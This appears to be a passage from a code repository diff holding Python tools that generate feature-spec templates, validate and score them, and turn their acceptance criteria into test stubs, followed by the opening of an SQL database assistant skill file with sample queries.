---
## Acceptance Criteria
_Write in Given/When/Then (Gherkin) format._
_Each criterion MUST reference at least one FR-* or NFR-*._
### AC-1: [Descriptive name] (FR-1)
Given [precondition]
When [action]
Then [expected result]
And [additional assertion]
### AC-2: [Descriptive name] (FR-2)
Given [precondition]
When [action]
Then [expected result]
### AC-3: [Descriptive name] (NFR-S2)
Given [precondition]
When [action]
Then [expected result]
And [additional assertion]
---
## Edge Cases
_For every external dependency (API, database, file system, user input), specify at least one failure scenario._
- EC-1: [Input/condition] -> [expected behavior].
- EC-2: [Input/condition] -> [expected behavior].
- EC-3: [External service] is unavailable -> [expected behavior].
- EC-4: [Concurrent/race condition] -> [expected behavior].
- EC-5: [Boundary value] -> [expected behavior].
---
## API Contracts
_Define request/response shapes using TypeScript-style notation._
_Cover all endpoints referenced in functional requirements._
### [METHOD] [endpoint]
Request:
```typescript
interface [Name]Request {{
field: string; // Description, constraints
optional?: number; // Default: [value]
}}
```
Success Response ([status code]):
```typescript
interface [Name]Response {{
id: string;
field: string;
createdAt: string; // ISO 8601
}}
```
Error Response ([status code]):
```typescript
interface [Name]Error {{
error: "[ERROR_CODE]";
message: string;
}}
```
---
## Data Models
_Define all entities referenced in requirements._
### [Entity Name]
| Field | Type | Constraints |
|-------|------|-------------|
| id | UUID | Primary key, auto-generated |
| [field] | [type] | [constraints] |
| createdAt | timestamp | UTC, immutable |
| updatedAt | timestamp | UTC, auto-updated |
---
## Out of Scope
_Explicit exclusions prevent scope creep. If someone asks for these during implementation, point them here._
- OS-1: [Feature/capability] — [reason for exclusion or link to future spec].
- OS-2: [Feature/capability] — [reason for exclusion].
- OS-3: [Feature/capability] — deferred to [version/sprint].
---
## Open Questions
_Track unresolved questions here. Each must be resolved before status moves to "Approved"._
- [ ] Q1: [Question] — Owner: [name], Due: [date]
- [ ] Q2: [Question] — Owner: [name], Due: [date]
"""
def generate_context_prompt(description: str) -> str:
"""Generate a context section prompt based on the provided description."""
if description:
return textwrap.dedent(f"""\
{description}
_Expand this context section to include:_
_- Why does this feature exist? What problem does it solve?_
_- What is the business motivation? (link to user research, support tickets, metrics)_
_- What is the current state? (what exists today, what pain points exist)_
_- 2-4 paragraphs maximum._""")
return textwrap.dedent("""\
_Why does this feature exist? What problem does it solve? What is the business
motivation? Include links to user research, support tickets, or metrics that
justify this work. 2-4 paragraphs maximum._""")
def generate_spec(name: str, description: str) -> str:
"""Generate a spec document from name and description."""
context_prompt = generate_context_prompt(description)
return SPEC_TEMPLATE.format(
name=name,
date=date.today().isoformat(),
context_prompt=context_prompt,
)
def generate_spec_json(name: str, description: str) -> Dict[str, Any]:
"""Generate structured JSON representation of the spec template."""
return {
"spec": {
"title": f"Spec: {name}",
"metadata": {
"author": "[your name]",
"date": date.today().isoformat(),
"status": "Draft",
"reviewers": [],
"related_specs": [],
},
"context": description or "[Describe why this feature exists]",
"functional_requirements": [
{"id": "FR-1", "keyword": "MUST", "description": "[describe required behavior]"},
{"id": "FR-2", "keyword": "MUST", "description": "[describe another required behavior]"},
{"id": "FR-3", "keyword": "SHOULD", "description": "[describe recommended behavior]"},
{"id": "FR-4", "keyword": "MAY", "description": "[describe optional behavior]"},
{"id": "FR-5", "keyword": "MUST NOT", "description": "[describe prohibited behavior]"},
],
"non_functional_requirements": {
"performance": [
{"id": "NFR-P1", "description": "[operation] MUST complete in < [threshold]"},
],
"security": [
{"id": "NFR-S1", "description": "All data in transit MUST be encrypted via TLS 1.2+"},
],
"accessibility": [
{"id": "NFR-A1", "description": "[UI component] MUST meet WCAG 2.1 AA"},
],
"scalability": [
{"id": "NFR-SC1", "description": "[system] SHOULD handle [N] concurrent [entities]"},
],
"reliability": [
{"id": "NFR-R1", "description": "[service] MUST maintain [N]% uptime"},
],
},
"acceptance_criteria": [
{
"id": "AC-1",
"name": "[descriptive name]",
"references": ["FR-1"],
"given": "[precondition]",
"when": "[action]",
"then": "[expected result]",
},
],
"edge_cases": [
{"id": "EC-1", "condition": "[input/condition]", "behavior": "[expected behavior]"},
],
"api_contracts": [
{
"method": "[METHOD]",
"endpoint": "[/api/path]",
"request_fields": [{"name": "field", "type": "string", "constraints": "[description]"}],
"success_response": {"status": 200, "fields": []},
"error_response": {"status": 400, "fields": []},
},
],
"data_models": [
{
"name": "[Entity]",
"fields": [
{"name": "id", "type": "UUID", "constraints": "Primary key, auto-generated"},
],
},
],
"out_of_scope": [
{"id": "OS-1", "description": "[feature/capability]", "reason": "[reason]"},
],
"open_questions": [],
},
"metadata": {
"generated_by": "spec_generator.py",
"feature_name": name,
"feature_description": description,
},
}
def main():
parser = argparse.ArgumentParser(
description="Generate a feature specification template from a name and description.",
epilog="Example: python spec_generator.py --name 'User Auth' --description 'OAuth 2.0 login flow'",
)
parser.add_argument(
"--name",
required=True,
help="Feature name (used as spec title)",
)
parser.add_argument(
"--description",
default="",
help="Brief feature description (used to seed the context section)",
)
parser.add_argument(
"--output",
"-o",
default=None,
help="Output file path (default: stdout)",
)
parser.add_argument(
"--format",
choices=["md", "json"],
default="md",
help="Output format: md (markdown) or json (default: md)",
)
parser.add_argument(
"--json",
action="store_true",
dest="json_flag",
help="Shorthand for --format json",
)
args = parser.parse_args()
output_format = "json" if args.json_flag else args.format
if output_format == "json":
result = generate_spec_json(args.name, args.description)
output = json.dumps(result, indent=2)
else:
output = generate_spec(args.name, args.description)
if args.output:
out_path = Path(args.output)
out_path.parent.mkdir(parents=True, exist_ok=True)
out_path.write_text(output, encoding="utf-8")
print(f"Spec template written to {out_path}", file=sys.stderr)
else:
print(output)
sys.exit(0)
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,461 @@
#!/usr/bin/env python3
"""
Spec Validator - Validates a feature specification for completeness and quality.
Checks that a spec document contains all required sections, uses RFC 2119 keywords
correctly, has acceptance criteria in Given/When/Then format, and scores overall
completeness from 0-100.
Sections checked:
- Context, Functional Requirements, Non-Functional Requirements
- Acceptance Criteria, Edge Cases, API Contracts, Data Models, Out of Scope
Exit codes: 0 = pass, 1 = warnings, 2 = critical (or --strict with score < 80)
No external dependencies - uses only Python standard library.
"""
import argparse
import json
import re
import sys
from pathlib import Path
from typing import Dict, List, Any, Tuple
# Section definitions: (key, display_name, required_header_patterns, weight)
SECTIONS = [
("context", "Context", [r"^##\s+Context"], 10),
("functional_requirements", "Functional Requirements", [r"^##\s+Functional\s+Requirements"], 15),
("non_functional_requirements", "Non-Functional Requirements", [r"^##\s+Non-Functional\s+Requirements"], 10),
("acceptance_criteria", "Acceptance Criteria", [r"^##\s+Acceptance\s+Criteria"], 20),
("edge_cases", "Edge Cases", [r"^##\s+Edge\s+Cases"], 10),
("api_contracts", "API Contracts", [r"^##\s+API\s+Contracts"], 10),
("data_models", "Data Models", [r"^##\s+Data\s+Models"], 10),
("out_of_scope", "Out of Scope", [r"^##\s+Out\s+of\s+Scope"], 10),
("metadata", "Metadata (Author/Date/Status)", [r"\*\*Author:\*\*", r"\*\*Date:\*\*", r"\*\*Status:\*\*"], 5),
]
RFC_KEYWORDS = ["MUST", "MUST NOT", "SHOULD", "SHOULD NOT", "MAY"]
# Patterns that indicate placeholder/unfilled content
PLACEHOLDER_PATTERNS = [
r"\[your\s+name\]",
r"\[list\s+reviewers\]",
r"\[describe\s+",
r"\[input/condition\]",
r"\[precondition\]",
r"\[action\]",
r"\[expected\s+result\]",
r"\[feature/capability\]",
r"\[operation\]",
r"\[threshold\]",
r"\[UI\s+component\]",
r"\[service\]",
r"\[percentage\]",
r"\[number\]",
r"\[METHOD\]",
r"\[endpoint\]",
r"\[Name\]",
r"\[Entity\s+Name\]",
r"\[type\]",
r"\[constraints\]",
r"\[field\]",
r"\[reason\]",
]
class SpecValidator:
"""Validates a spec document for completeness and quality."""
def __init__(self, content: str, file_path: str = ""):
self.content = content
self.file_path = file_path
self.lines = content.split("\n")
self.findings: List[Dict[str, Any]] = []
self.section_scores: Dict[str, Dict[str, Any]] = {}
def validate(self) -> Dict[str, Any]:
"""Run all validation checks and return results."""
self._check_sections_present()
self._check_functional_requirements()
self._check_acceptance_criteria()
self._check_edge_cases()
self._check_rfc_keywords()
self._check_api_contracts()
self._check_data_models()
self._check_out_of_scope()
self._check_placeholders()
self._check_traceability()
total_score = self._calculate_score()
return {
"file": self.file_path,
"score": total_score,
"grade": self._score_to_grade(total_score),
"sections": self.section_scores,
"findings": self.findings,
"summary": self._build_summary(total_score),
}
def _add_finding(self, severity: str, section: str, message: str):
"""Record a validation finding."""
self.findings.append({
"severity": severity, # "error", "warning", "info"
"section": section,
"message": message,
})
def _find_section_content(self, header_pattern: str) -> str:
"""Extract content between a section header and the next ## header."""
in_section = False
section_lines = []
for line in self.lines:
if re.match(header_pattern, line, re.IGNORECASE):
in_section = True
continue
if in_section and re.match(r"^##\s+", line):
break
if in_section:
section_lines.append(line)
return "\n".join(section_lines)
def _check_sections_present(self):
"""Check that all required sections exist."""
for key, name, patterns, weight in SECTIONS:
found = False
for pattern in patterns:
for line in self.lines:
if re.search(pattern, line, re.IGNORECASE):
found = True
break
if found:
break
if found:
self.section_scores[key] = {"name": name, "present": True, "score": weight, "max": weight}
else:
self.section_scores[key] = {"name": name, "present": False, "score": 0, "max": weight}
self._add_finding("error", key, f"Missing section: {name}")
def _check_functional_requirements(self):
"""Validate functional requirements format and content."""
content = self._find_section_content(r"^##\s+Functional\s+Requirements")
if not content.strip():
return
fr_pattern = re.compile(r"-\s+FR-(\d+):")
matches = fr_pattern.findall(content)
if not matches:
self._add_finding("error", "functional_requirements", "No numbered requirements found (expected FR-N: format)")
if "functional_requirements" in self.section_scores:
self.section_scores["functional_requirements"]["score"] = max(
0, self.section_scores["functional_requirements"]["score"] - 10
)
return
fr_count = len(matches)
if fr_count < 3:
self._add_finding("warning", "functional_requirements", f"Only {fr_count} requirements found. Most features need 3+.")
# Check for RFC keywords
has_keyword = False
for kw in RFC_KEYWORDS:
if kw in content:
has_keyword = True
break
if not has_keyword:
self._add_finding("warning", "functional_requirements", "No RFC 2119 keywords (MUST/SHOULD/MAY) found.")
def _check_acceptance_criteria(self):
"""Validate acceptance criteria use Given/When/Then format."""
content = self._find_section_content(r"^##\s+Acceptance\s+Criteria")
if not content.strip():
return
ac_pattern = re.compile(r"###\s+AC-(\d+):")
matches = ac_pattern.findall(content)
if not matches:
self._add_finding("error", "acceptance_criteria", "No numbered acceptance criteria found (expected ### AC-N: format)")
if "acceptance_criteria" in self.section_scores:
self.section_scores["acceptance_criteria"]["score"] = max(
0, self.section_scores["acceptance_criteria"]["score"] - 15
)
return
ac_count = len(matches)
# Check Given/When/Then
given_count = len(re.findall(r"(?i)\bgiven\b", content))
when_count = len(re.findall(r"(?i)\bwhen\b", content))
then_count = len(re.findall(r"(?i)\bthen\b", content))
if given_count < ac_count:
self._add_finding("warning", "acceptance_criteria",
f"Found {ac_count} criteria but only {given_count} 'Given' clauses. Each AC needs Given/When/Then.")
if when_count < ac_count:
self._add_finding("warning", "acceptance_criteria",
f"Found {ac_count} criteria but only {when_count} 'When' clauses.")
if then_count < ac_count:
self._add_finding("warning", "acceptance_criteria",
f"Found {ac_count} criteria but only {then_count} 'Then' clauses.")
# Check for FR references
fr_refs = re.findall(r"\(FR-\d+", content)
if not fr_refs:
self._add_finding("warning", "acceptance_criteria",
"No acceptance criteria reference functional requirements (expected (FR-N) in title).")
def _check_edge_cases(self):
"""Validate edge cases section."""
content = self._find_section_content(r"^##\s+Edge\s+Cases")
if not content.strip():
return
ec_pattern = re.compile(r"-\s+EC-(\d+):")
matches = ec_pattern.findall(content)
if not matches:
self._add_finding("warning", "edge_cases", "No numbered edge cases found (expected EC-N: format)")
elif len(matches) < 3:
self._add_finding("warning", "edge_cases", f"Only {len(matches)} edge cases. Consider failure modes for each external dependency.")
def _check_rfc_keywords(self):
"""Check RFC 2119 keywords are used consistently (capitalized)."""
# Look for lowercase must/should/may that might be intended as RFC keywords
context_content = self._find_section_content(r"^##\s+Functional\s+Requirements")
context_content += self._find_section_content(r"^##\s+Non-Functional\s+Requirements")
for kw in ["must", "should", "may"]:
# Find lowercase usage in requirement-like sentences
pattern = rf"(?:system|service|API|endpoint)\s+{kw}\s+"
if re.search(pattern, context_content):
self._add_finding("warning", "rfc_keywords",
f"Found lowercase '{kw}' in requirements. RFC 2119 keywords should be UPPERCASE: {kw.upper()}")
def _check_api_contracts(self):
"""Validate API contracts section."""
content = self._find_section_content(r"^##\s+API\s+Contracts")
if not content.strip():
return
# Check for at least one endpoint definition
has_endpoint = bool(re.search(r"(GET|POST|PUT|PATCH|DELETE)\s+/", content))
if not has_endpoint:
self._add_finding("warning", "api_contracts", "No HTTP method + path found (expected e.g., POST /api/endpoint)")
# Check for request/response definitions
has_interface = bool(re.search(r"interface\s+\w+", content))
if not has_interface:
self._add_finding("info", "api_contracts", "No TypeScript interfaces found. Consider defining request/response shapes.")
def _check_data_models(self):
"""Validate data models section."""
content = self._find_section_content(r"^##\s+Data\s+Models")
if not content.strip():
return
# Check for table format
has_table = bool(re.search(r"\|.*\|.*\|", content))
if not has_table:
self._add_finding("warning", "data_models", "No table-formatted data models found. Use | Field | Type | Constraints | format.")
def _check_out_of_scope(self):
"""Validate out of scope section."""
content = self._find_section_content(r"^##\s+Out\s+of\s+Scope")
if not content.strip():
return
os_pattern = re.compile(r"-\s+OS-(\d+):")
matches = os_pattern.findall(content)
if not matches:
self._add_finding("warning", "out_of_scope", "No numbered exclusions found (expected OS-N: format)")
elif len(matches) < 2:
self._add_finding("info", "out_of_scope", "Only 1 exclusion listed. Consider what was deliberately left out.")
def _check_placeholders(self):
"""Check for unfilled placeholder text."""
placeholder_count = 0
for pattern in PLACEHOLDER_PATTERNS:
matches = re.findall(pattern, self.content, re.IGNORECASE)
placeholder_count += len(matches)
if placeholder_count > 0:
self._add_finding("warning", "placeholders",
f"Found {placeholder_count} placeholder(s) that need to be filled in (e.g., [your name], [describe ...]).")
# Deduct from overall score proportionally
for key in self.section_scores:
if self.section_scores[key]["present"]:
deduction = min(3, self.section_scores[key]["score"])
self.section_scores[key]["score"] = max(0, self.section_scores[key]["score"] - deduction)
def _check_traceability(self):
"""Check that acceptance criteria reference functional requirements."""
ac_content = self._find_section_content(r"^##\s+Acceptance\s+Criteria")
fr_content = self._find_section_content(r"^##\s+Functional\s+Requirements")
if not ac_content.strip() or not fr_content.strip():
return
# Extract FR IDs
fr_ids = set(re.findall(r"FR-(\d+)", fr_content))
# Extract FR references from AC
ac_fr_refs = set(re.findall(r"FR-(\d+)", ac_content))
unreferenced = fr_ids - ac_fr_refs
if unreferenced:
unreferenced_list = ", ".join(f"FR-{i}" for i in sorted(unreferenced))
self._add_finding("warning", "traceability",
f"Functional requirements without acceptance criteria: {unreferenced_list}")
def _calculate_score(self) -> int:
"""Calculate the total completeness score."""
total = sum(s["score"] for s in self.section_scores.values())
maximum = sum(s["max"] for s in self.section_scores.values())
if maximum == 0:
return 0
# Apply finding-based deductions
error_count = sum(1 for f in self.findings if f["severity"] == "error")
warning_count = sum(1 for f in self.findings if f["severity"] == "warning")
base_score = round((total / maximum) * 100)
deduction = (error_count * 5) + (warning_count * 2)
return max(0, min(100, base_score - deduction))
@staticmethod
def _score_to_grade(score: int) -> str:
"""Convert score to letter grade."""
if score >= 90:
return "A"
if score >= 80:
return "B"
if score >= 70:
return "C"
if score >= 60:
return "D"
return "F"
def _build_summary(self, score: int) -> str:
"""Build human-readable summary."""
errors = [f for f in self.findings if f["severity"] == "error"]
warnings = [f for f in self.findings if f["severity"] == "warning"]
infos = [f for f in self.findings if f["severity"] == "info"]
lines = [
f"Spec Completeness Score: {score}/100 (Grade: {self._score_to_grade(score)})",
f"Errors: {len(errors)}, Warnings: {len(warnings)}, Info: {len(infos)}",
"",
]
if errors:
lines.append("ERRORS (must fix):")
for e in errors:
lines.append(f" [{e['section']}] {e['message']}")
lines.append("")
if warnings:
lines.append("WARNINGS (should fix):")
for w in warnings:
lines.append(f" [{w['section']}] {w['message']}")
lines.append("")
if infos:
lines.append("INFO:")
for i in infos:
lines.append(f" [{i['section']}] {i['message']}")
lines.append("")
# Section breakdown
lines.append("Section Breakdown:")
for key, data in self.section_scores.items():
status = "PRESENT" if data["present"] else "MISSING"
lines.append(f" {data['name']}: {data['score']}/{data['max']} ({status})")
return "\n".join(lines)
def format_human(result: Dict[str, Any]) -> str:
"""Format validation result for human reading."""
lines = [
"=" * 60,
"SPEC VALIDATION REPORT",
"=" * 60,
"",
]
if result["file"]:
lines.append(f"File: {result['file']}")
lines.append("")
lines.append(result["summary"])
return "\n".join(lines)
def main():
parser = argparse.ArgumentParser(
description="Validate a feature specification for completeness and quality.",
epilog="Example: python spec_validator.py --file spec.md --strict",
)
parser.add_argument(
"--file",
"-f",
required=True,
help="Path to the spec markdown file",
)
parser.add_argument(
"--strict",
action="store_true",
help="Exit with code 2 if score is below 80",
)
parser.add_argument(
"--json",
action="store_true",
dest="json_flag",
help="Output results as JSON",
)
args = parser.parse_args()
file_path = Path(args.file)
if not file_path.exists():
print(f"Error: File not found: {file_path}", file=sys.stderr)
sys.exit(2)
content = file_path.read_text(encoding="utf-8")
if not content.strip():
print(f"Error: File is empty: {file_path}", file=sys.stderr)
sys.exit(2)
validator = SpecValidator(content, str(file_path))
result = validator.validate()
if args.json_flag:
print(json.dumps(result, indent=2))
else:
print(format_human(result))
# Determine exit code
score = result["score"]
has_errors = any(f["severity"] == "error" for f in result["findings"])
has_warnings = any(f["severity"] == "warning" for f in result["findings"])
if args.strict and score < 80:
sys.exit(2)
elif has_errors:
sys.exit(2)
elif has_warnings:
sys.exit(1)
else:
sys.exit(0)
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,431 @@
#!/usr/bin/env python3
"""
Test Extractor - Extracts test case stubs from a feature specification.
Parses acceptance criteria (Given/When/Then) and edge cases from a spec
document, then generates test stubs for the specified framework.
Supported frameworks: pytest, jest, go-test
Exit codes: 0 = success, 1 = warnings (some criteria unparseable), 2 = critical error
No external dependencies - uses only Python standard library.
"""
import argparse
import json
import re
import sys
import textwrap
from pathlib import Path
from typing import Dict, List, Any, Optional, Tuple
class SpecParser:
"""Parses spec documents to extract testable criteria."""
def __init__(self, content: str):
self.content = content
self.lines = content.split("\n")
def extract_acceptance_criteria(self) -> List[Dict[str, Any]]:
"""Extract AC-N blocks with Given/When/Then clauses."""
criteria = []
ac_pattern = re.compile(r"###\s+AC-(\d+):\s*(.+?)(?:\s*\(([^)]+)\))?\s*$")
in_ac = False
current_ac: Optional[Dict[str, Any]] = None
body_lines: List[str] = []
for line in self.lines:
match = ac_pattern.match(line)
if match:
# Save previous AC
if current_ac is not None:
current_ac["body"] = "\n".join(body_lines).strip()
self._parse_gwt(current_ac)
criteria.append(current_ac)
ac_id = int(match.group(1))
name = match.group(2).strip()
refs = match.group(3).strip() if match.group(3) else ""
current_ac = {
"id": f"AC-{ac_id}",
"name": name,
"references": [r.strip() for r in refs.split(",") if r.strip()] if refs else [],
"given": "",
"when": "",
"then": [],
"body": "",
}
body_lines = []
in_ac = True
elif in_ac:
# Check if we hit another ## section
if re.match(r"^##\s+", line) and not re.match(r"^###\s+", line):
in_ac = False
if current_ac is not None:
current_ac["body"] = "\n".join(body_lines).strip()
self._parse_gwt(current_ac)
criteria.append(current_ac)
current_ac = None
else:
body_lines.append(line)
# Don't forget the last one
if current_ac is not None:
current_ac["body"] = "\n".join(body_lines).strip()
self._parse_gwt(current_ac)
criteria.append(current_ac)
return criteria
def extract_edge_cases(self) -> List[Dict[str, Any]]:
"""Extract EC-N edge case items."""
edge_cases = []
ec_pattern = re.compile(r"-\s+EC-(\d+):\s*(.+?)(?:\s*->\s*|\s*->\s*|\s*→\s*)(.+)")
in_section = False
for line in self.lines:
if re.match(r"^##\s+Edge\s+Cases", line, re.IGNORECASE):
in_section = True
continue
if in_section and re.match(r"^##\s+", line):
break
if in_section:
match = ec_pattern.match(line.strip())
if match:
edge_cases.append({
"id": f"EC-{match.group(1)}",
"condition": match.group(2).strip().rstrip("."),
"behavior": match.group(3).strip().rstrip("."),
})
return edge_cases
def extract_spec_title(self) -> str:
"""Extract the spec title from the first H1."""
for line in self.lines:
match = re.match(r"^#\s+(?:Spec:\s*)?(.+)", line)
if match:
return match.group(1).strip()
return "UnknownFeature"
@staticmethod
def _parse_gwt(ac: Dict[str, Any]):
"""Parse Given/When/Then from the AC body text."""
body = ac["body"]
lines = body.split("\n")
current_section = None
for line in lines:
stripped = line.strip()
if not stripped:
continue
lower = stripped.lower()
if lower.startswith("given "):
current_section = "given"
ac["given"] = stripped[6:].strip()
elif lower.startswith("when "):
current_section = "when"
ac["when"] = stripped[5:].strip()
elif lower.startswith("then "):
current_section = "then"
ac["then"].append(stripped[5:].strip())
elif lower.startswith("and "):
if current_section == "then":
ac["then"].append(stripped[4:].strip())
elif current_section == "given":
ac["given"] += " AND " + stripped[4:].strip()
elif current_section == "when":
ac["when"] += " AND " + stripped[4:].strip()
def _sanitize_name(name: str) -> str:
"""Convert a human-readable name to a valid function/method name."""
# Remove parenthetical references like (FR-1)
name = re.sub(r"\([^)]*\)", "", name)
# Replace non-alphanumeric with underscore
name = re.sub(r"[^a-zA-Z0-9]+", "_", name)
# Remove leading/trailing underscores
name = name.strip("_").lower()
return name or "unnamed"
def _to_pascal_case(name: str) -> str:
"""Convert to PascalCase for Go test names."""
parts = _sanitize_name(name).split("_")
return "".join(p.capitalize() for p in parts if p)
class PytestGenerator:
"""Generates pytest test stubs."""
def generate(self, title: str, criteria: List[Dict], edge_cases: List[Dict]) -> str:
class_name = "Test" + _to_pascal_case(title)
lines = [
'"""',
f"Test suite for: {title}",
f"Auto-generated from spec. {len(criteria)} acceptance criteria, {len(edge_cases)} edge cases.",
"",
"All tests are stubs — implement the test body to make them pass.",
'"""',
"",
"import pytest",
"",
"",
f"class {class_name}:",
f' """Tests for {title}."""',
"",
]
for ac in criteria:
method_name = f"test_{ac['id'].lower().replace('-', '')}_{_sanitize_name(ac['name'])}"
docstring = f'{ac["id"]}: {ac["name"]}'
ref_str = f" [{', '.join(ac['references'])}]" if ac["references"] else ""
lines.append(f" def {method_name}(self):")
lines.append(f' """{docstring}{ref_str}"""')
if ac["given"]:
lines.append(f" # Given {ac['given']}")
if ac["when"]:
lines.append(f" # When {ac['when']}")
for t in ac["then"]:
lines.append(f" # Then {t}")
lines.append(' raise NotImplementedError("Implement this test")')
lines.append("")
if edge_cases:
lines.append(" # --- Edge Cases ---")
lines.append("")
for ec in edge_cases:
method_name = f"test_{ec['id'].lower().replace('-', '')}_{_sanitize_name(ec['condition'])}"
lines.append(f" def {method_name}(self):")
lines.append(f' """{ec["id"]}: {ec["condition"]} -> {ec["behavior"]}"""')
lines.append(f" # Condition: {ec['condition']}")
lines.append(f" # Expected: {ec['behavior']}")
lines.append(' raise NotImplementedError("Implement this test")')
lines.append("")
return "\n".join(lines)
class JestGenerator:
"""Generates Jest/Vitest test stubs (TypeScript)."""
def generate(self, title: str, criteria: List[Dict], edge_cases: List[Dict]) -> str:
lines = [
f"/**",
f" * Test suite for: {title}",
f" * Auto-generated from spec. {len(criteria)} acceptance criteria, {len(edge_cases)} edge cases.",
f" *",
f" * All tests are stubs — implement the test body to make them pass.",
f" */",
"",
f'describe("{title}", () => {{',
]
for ac in criteria:
ref_str = f" [{', '.join(ac['references'])}]" if ac["references"] else ""
test_name = f"{ac['id']}: {ac['name']}{ref_str}"
lines.append(f' it("{test_name}", () => {{')
if ac["given"]:
lines.append(f" // Given {ac['given']}")
if ac["when"]:
lines.append(f" // When {ac['when']}")
for t in ac["then"]:
lines.append(f" // Then {t}")
lines.append("")
lines.append(' throw new Error("Not implemented");')
lines.append(" });")
lines.append("")
if edge_cases:
lines.append(" // --- Edge Cases ---")
lines.append("")
for ec in edge_cases:
test_name = f"{ec['id']}: {ec['condition']}"
lines.append(f' it("{test_name}", () => {{')
lines.append(f" // Condition: {ec['condition']}")
lines.append(f" // Expected: {ec['behavior']}")
lines.append("")
lines.append(' throw new Error("Not implemented");')
lines.append(" });")
lines.append("")
lines.append("});")
lines.append("")
return "\n".join(lines)
class GoTestGenerator:
"""Generates Go test stubs."""
def generate(self, title: str, criteria: List[Dict], edge_cases: List[Dict]) -> str:
package_name = _sanitize_name(title).split("_")[0] or "feature"
lines = [
f"package {package_name}_test",
"",
"import (",
'\t"testing"',
")",
"",
f"// Test suite for: {title}",
f"// Auto-generated from spec. {len(criteria)} acceptance criteria, {len(edge_cases)} edge cases.",
f"// All tests are stubs — implement the test body to make them pass.",
"",
]
for ac in criteria:
func_name = "Test" + _to_pascal_case(ac["id"] + " " + ac["name"])
ref_str = f" [{', '.join(ac['references'])}]" if ac["references"] else ""
lines.append(f"// {ac['id']}: {ac['name']}{ref_str}")
lines.append(f"func {func_name}(t *testing.T) {{")
if ac["given"]:
lines.append(f"\t// Given {ac['given']}")
if ac["when"]:
lines.append(f"\t// When {ac['when']}")
for then_clause in ac["then"]:
lines.append(f"\t// Then {then_clause}")
lines.append("")
lines.append('\tt.Fatal("Not implemented")')
lines.append("}")
lines.append("")
if edge_cases:
lines.append("// --- Edge Cases ---")
lines.append("")
for ec in edge_cases:
func_name = "Test" + _to_pascal_case(ec["id"] + " " + ec["condition"])
lines.append(f"// {ec['id']}: {ec['condition']} -> {ec['behavior']}")
lines.append(f"func {func_name}(t *testing.T) {{")
lines.append(f"\t// Condition: {ec['condition']}")
lines.append(f"\t// Expected: {ec['behavior']}")
lines.append("")
lines.append('\tt.Fatal("Not implemented")')
lines.append("}")
lines.append("")
return "\n".join(lines)
GENERATORS = {
"pytest": PytestGenerator,
"jest": JestGenerator,
"go-test": GoTestGenerator,
}
FILE_EXTENSIONS = {
"pytest": ".py",
"jest": ".test.ts",
"go-test": "_test.go",
}
def main():
parser = argparse.ArgumentParser(
description="Extract test case stubs from a feature specification.",
epilog="Example: python test_extractor.py --file spec.md --framework pytest --output tests/test_feature.py",
)
parser.add_argument(
"--file",
"-f",
required=True,
help="Path to the spec markdown file",
)
parser.add_argument(
"--framework",
choices=list(GENERATORS.keys()),
default="pytest",
help="Target test framework (default: pytest)",
)
parser.add_argument(
"--output",
"-o",
default=None,
help="Output file path (default: stdout)",
)
parser.add_argument(
"--json",
action="store_true",
dest="json_flag",
help="Output extracted criteria as JSON instead of test code",
)
args = parser.parse_args()
file_path = Path(args.file)
if not file_path.exists():
print(f"Error: File not found: {file_path}", file=sys.stderr)
sys.exit(2)
content = file_path.read_text(encoding="utf-8")
if not content.strip():
print(f"Error: File is empty: {file_path}", file=sys.stderr)
sys.exit(2)
spec_parser = SpecParser(content)
title = spec_parser.extract_spec_title()
criteria = spec_parser.extract_acceptance_criteria()
edge_cases = spec_parser.extract_edge_cases()
if not criteria and not edge_cases:
print("Error: No acceptance criteria or edge cases found in spec.", file=sys.stderr)
sys.exit(2)
warnings = []
for ac in criteria:
if not ac["given"] and not ac["when"]:
warnings.append(f"{ac['id']}: Could not parse Given/When/Then — check format.")
if args.json_flag:
result = {
"spec_title": title,
"framework": args.framework,
"acceptance_criteria": criteria,
"edge_cases": edge_cases,
"warnings": warnings,
"counts": {
"acceptance_criteria": len(criteria),
"edge_cases": len(edge_cases),
"total_test_cases": len(criteria) + len(edge_cases),
},
}
output = json.dumps(result, indent=2)
else:
generator_class = GENERATORS[args.framework]
generator = generator_class()
output = generator.generate(title, criteria, edge_cases)
if args.output:
out_path = Path(args.output)
out_path.parent.mkdir(parents=True, exist_ok=True)
out_path.write_text(output, encoding="utf-8")
total = len(criteria) + len(edge_cases)
print(f"Generated {total} test stubs -> {out_path}", file=sys.stderr)
else:
print(output)
if warnings:
for w in warnings:
print(f"Warning: {w}", file=sys.stderr)
sys.exit(1)
sys.exit(0)
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,457 @@
---
name: "sql-database-assistant"
description: "Use when the user asks to write SQL queries, optimize database performance, generate migrations, explore database schemas, or work with ORMs like Prisma, Drizzle, TypeORM, or SQLAlchemy."
---
# SQL Database Assistant - POWERFUL Tier Skill
## Overview
The operational companion to database design. While **database-designer** focuses on schema architecture and **database-schema-designer** handles ERD modeling, this skill covers the day-to-day: writing queries, optimizing performance, generating migrations, and bridging the gap between application code and database engines.
### Core Capabilities
- **Natural Language to SQL** — translate requirements into correct, performant queries
- **Schema Exploration** — introspect live databases across PostgreSQL, MySQL, SQLite, SQL Server
- **Query Optimization** — EXPLAIN analysis, index recommendations, N+1 detection, rewrite patterns
- **Migration Generation** — up/down scripts, zero-downtime strategies, rollback plans
- **ORM Integration** — Prisma, Drizzle, TypeORM, SQLAlchemy patterns and escape hatches
- **Multi-Database Support** — dialect-aware SQL with compatibility guidance
### Tools
| Script | Purpose |
|--------|---------|
| `scripts/query_optimizer.py` | Static analysis of SQL queries for performance issues |
| `scripts/migration_generator.py` | Generate migration file templates from change descriptions |
| `scripts/schema_explorer.py` | Generate schema documentation from introspection queries |
---
## Natural Language to SQL
### Translation Patterns
When converting requirements to SQL, follow this sequence:
1. **Identify entities** — map nouns to tables
2. **Identify relationships** — map verbs to JOINs or subqueries
3. **Identify filters** — map adjectives/conditions to WHERE clauses
4. **Identify aggregations** — map "total", "average", "count" to GROUP BY
5. **Identify ordering** — map "top", "latest", "highest" to ORDER BY + LIMIT
### Common Query Templates
**Top-N per group (window function)**
```sql
SELECT * FROM (
SELECT *, ROW_NUMBER() OVER (PARTITION BY department_id ORDER BY salary DESC) AS rn
FROM employees
) ranked WHERE rn <= 3;
```
**Running totals**
```sql
SELECT date, amount,
SUM(amount) OVER (ORDER BY date ROWS BETWEEN UNBOUNDED PRECEDING AND CURRENT ROW) AS running_total
FROM transactions;
```
**Gap detection**
```sql
SELECT curr.id, curr.seq_num, prev.seq_num AS prev_seq
